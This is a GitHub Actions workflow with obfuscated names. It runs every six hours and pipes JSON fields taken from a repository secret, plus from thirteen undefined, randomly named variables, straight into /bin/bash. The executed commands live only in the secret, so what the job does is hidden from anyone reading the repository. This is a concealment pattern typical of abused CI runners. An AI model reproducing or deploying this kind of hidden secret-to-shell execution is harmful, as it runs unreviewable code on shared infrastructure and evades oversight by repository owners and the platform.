name: jiaoluyouj
on:
  workflow_dispatch:
  schedule:
    - cron: '42 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiaoluyouj
        env:
          ix00: ${{ secrets.ix00 }}
        run: |
          echo $ix00 | jq -r .iknse13692 | /bin/bash
          echo $cnq4503 | jq -r .z9 | /bin/bash
          echo $ws285 | jq -r .t20531 | /bin/bash
          echo $ifnbu1008 | jq -r .f680 | /bin/bash
          echo $greit11 | jq -r .zvpzb89921 | /bin/bash
          echo $y9 | jq -r .icrqt5 | /bin/bash
          echo $qrte929 | jq -r .opkrk1218 | /bin/bash
          echo $p19925 | jq -r .cgwm4 | /bin/bash
          echo $a2257 | jq -r .qbzus429 | /bin/bash
          echo $pis3660 | jq -r .h52700 | /bin/bash
          echo $cxqx26 | jq -r .szyey19 | /bin/bash
          echo $nw0432 | jq -r .rovq5 | /bin/bash
          echo $eo547 | jq -r .sqs43 | /bin/bash
          echo $ck3839 | jq -r .uau1 | /bin/bash

